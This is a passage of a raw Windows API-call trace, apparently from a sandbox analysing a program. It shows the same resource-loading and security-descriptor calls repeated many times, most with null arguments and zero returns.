lpType=0x3) returned 0x0 [0219.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.970] LockResource (hResData=0x0) returned 0x0 [0219.970] FreeResource (hResData=0x0) returned 0 [0219.970] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.970] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.970] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.970] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.970] LockResource (hResData=0x0) returned 0x0 [0219.970] FreeResource (hResData=0x0) returned 0 [0219.970] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.970] LockResource (hResData=0x0) returned 0x0 [0219.970] FreeResource (hResData=0x0) returned 0 [0219.970] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.970] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.971] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.971] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.971] LockResource (hResData=0x0) returned 0x0 [0219.971] FreeResource (hResData=0x0) returned 0 [0219.971] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.971] LockResource (hResData=0x0) returned 0x0 [0219.971] FreeResource (hResData=0x0) returned 0 [0219.971] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.971] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.971] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.971] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.971] LockResource (hResData=0x0) returned 0x0 [0219.971] FreeResource (hResData=0x0) returned 0 [0219.971] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.971] LockResource (hResData=0x0) returned 0x0 [0219.971] FreeResource (hResData=0x0) returned 0 [0219.971] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.971] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.971] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.971] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.971] LockResource (hResData=0x0) returned 0x0 [0219.971] FreeResource (hResData=0x0) returned 0 [0219.971] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.971] LockResource (hResData=0x0) returned 0x0 [0219.971] FreeResource (hResData=0x0) returned 0 [0219.971] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.971] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.971] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.971] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.971] LockResource (hResData=0x0) returned 0x0 [0219.971] FreeResource (hResData=0x0) returned 0 [0219.971] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.971] LockResource (hResData=0x0) returned 0x0 [0219.971] FreeResource (hResData=0x0) returned 0 [0219.972] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.972] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.972] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.972] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.972] LockResource (hResData=0x0) returned 0x0 [0219.972] FreeResource (hResData=0x0) returned 0 [0219.972] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.972] LockResource (hResData=0x0) returned 0x0 [0219.972] FreeResource (hResData=0x0) returned 0 [0219.972] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.972] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.972] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.972] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.972] LockResource (hResData=0x0) returned 0x0 [0219.972] FreeResource (hResData=0x0) returned 0 [0219.972] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.972] LockResource (hResData=0x0) returned 0x0 [0219.972] FreeResource (hResData=0x0) returned 0 [0219.972] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.972] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.972] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.972] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.972] LockResource (hResData=0x0) returned 0x0 [0219.972] FreeResource (hResData=0x0) returned 0 [0219.972] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.972] LockResource (hResData=0x0) returned 0x0 [0219.972] FreeResource (hResData=0x0) returned 0 [0219.972] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.972] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.972] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.972] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.972] LockResource (hResData=0x0) returned 0x0 [0219.972] FreeResource (hResData=0x0) returned 0 [0219.972] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.972] LockResource (hResData=0x0) returned 0x0 [0219.973] FreeResource (hResData=0x0) returned 0 [0219.973] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.973] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.973] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.973] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.973] LockResource (hResData=0x0) returned 0x0 [0219.973] FreeResource (hResData=0x0) returned 0 [0219.973] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.973] LockResource (hResData=0x0) returned 0x0 [0219.973] FreeResource (hResData=0x0) returned 0 [0219.973] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.973] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.973] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.973] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.973] LockResource (hResData=0x0) returned 0x0 [0219.973] FreeResource (hResData=0x0) returned 0 [0219.973] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.973] LockResource (hResData=0x0) returned 0x0 [0219.973] FreeResource (hResData=0x0) returned 0 [0219.973] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.973] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.973] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.973] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.973] LockResource (hResData=0x0) returned 0x0 [0219.973] FreeResource (hResData=0x0) returned 0 [0219.973] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.973] LockResource (hResData=0x0) returned 0x0 [0219.973] FreeResource (hResData=0x0) returned 0 [0219.973] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.973] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.973] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.973] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.973] LockResource (hResData=0x0) returned 0x0 [0219.973] FreeResource (hResData=0x0) returned 0 [0219.973] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.974] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.974] LockResource (hResData=0x0) returned 0x0 [0219.974] FreeResource (hResData=0x0) returned 0 [0219.974] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.974] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.974] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.974] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.974] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.974] LockResource (hResData=0x0) returned 0x0 [0219.974] FreeResource (hResData=0x0) returned 0 [0219.974] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.974] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.974] LockResource (hResData=0x0) returned 0x0 [0219.974] FreeResource (hResData=0x0) returned 0 [0219.974] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.974] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.974] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.974] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.974] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.974] LockResource (hResData=0x0) returned 0x0 [0219.974] FreeResource (hResData=0x0) returned 0 [0219.974] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.974] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.974] LockResource (hResData=0x0) returned 0x0 [0219.974] FreeResource (hResData=0x0) returned 0 [0219.974] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.974] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.974] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.974] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.974] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.974] LockResource (hResData=0x0) returned 0x0 [0219.974] FreeResource (hResData=0x0) returned 0 [0219.975] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.975] LockResource (hResData=0x0) returned 0x0 [0219.975] FreeResource (hResData=0x0) returned 0 [0219.975] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.975] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.975] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.975] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.975] LockResource (hResData=0x0) returned 0x0 [0219.975] FreeResource (hResData=0x0) returned 0 [0219.975] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.975] LockResource (hResData=0x0) returned 0x0 [0219.975] FreeResource (hResData=0x0) returned 0 [0219.975] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.975] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.975] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.975] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.975] LockResource (hResData=0x0) returned 0x0 [0219.975] FreeResource (hResData=0x0) returned 0 [0219.975] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.975] LockResource (hResData=0x0) returned 0x0 [0219.975] FreeResource (hResData=0x0) returned 0 [0219.975] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.975] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.975] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.975] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.975] LockResource (hResData=0x0) returned 0x0 [0219.975] FreeResource (hResData=0x0) returned 0 [0219.975] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.975] LockResource (hResData=0x0) returned 0x0 [0219.975] FreeResource (hResData=0x0) returned 0 [0219.975] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.975] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.975] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.975] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.975] LockResource (hResData=0x0) returned 0x0 [0219.975] FreeResource (hResData=0x0) returned 0 [0219.975] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.975] LockResource (hResData=0x0) returned 0x0 [0219.976] FreeResource (hResData=0x0) returned 0 [0219.976] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.976] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.976] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.976] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.976] LockResource (hResData=0x0) returned 0x0 [0219.976] FreeResource (hResData=0x0) returned 0 [0219.976] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.976] LockResource (hResData=0x0) returned 0x0 [0219.976] FreeResource (hResData=0x0) returned 0 [0219.976] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.976] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.976] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.976] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.976] LockResource (hResData=0x0) returned 0x0 [0219.976] FreeResource (hResData=0x0) returned 0 [0219.976] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.976] LockResource (hResData=0x0) returned 0x0 [0219.976] FreeResource (hResData=0x0) returned 0 [0219.976] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.976] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.976] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.976] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.976] LockResource (hResData=0x0) returned 0x0 [0219.976] FreeResource (hResData=0x0) returned 0 [0219.976] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.976] LockResource (hResData=0x0) returned 0x0 [0219.976] FreeResource (hResData=0x0) returned 0 [0219.976] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.976] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.976] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.976] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.976] LockResource (hResData=0x0) returned 0x0 [0219.976] FreeResource (hResData=0x0) returned 0 [0219.976] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.976] LockResource (hResData=0x0) returned 0x0 [0219.976] FreeResource (hResData=0x0) returned 0 [0219.976] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.976] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.976] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.976] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.977] LockResource (hResData=0x0) returned 0x0 [0219.977] FreeResource (hResData=0x0) returned 0 [0219.977] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.977] LockResource (hResData=0x0) returned 0x0 [0219.977] FreeResource (hResData=0x0) returned 0 [0219.977] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.977] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.977] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.977] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.977] LockResource (hResData=0x0) returned 0x0 [0219.977] FreeResource (hResData=0x0) returned 0 [0219.977] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.977] LockResource (hResData=0x0) returned 0x0 [0219.977] FreeResource (hResData=0x0) returned 0 [0219.977] GetPrivateObjectSecurity (in: 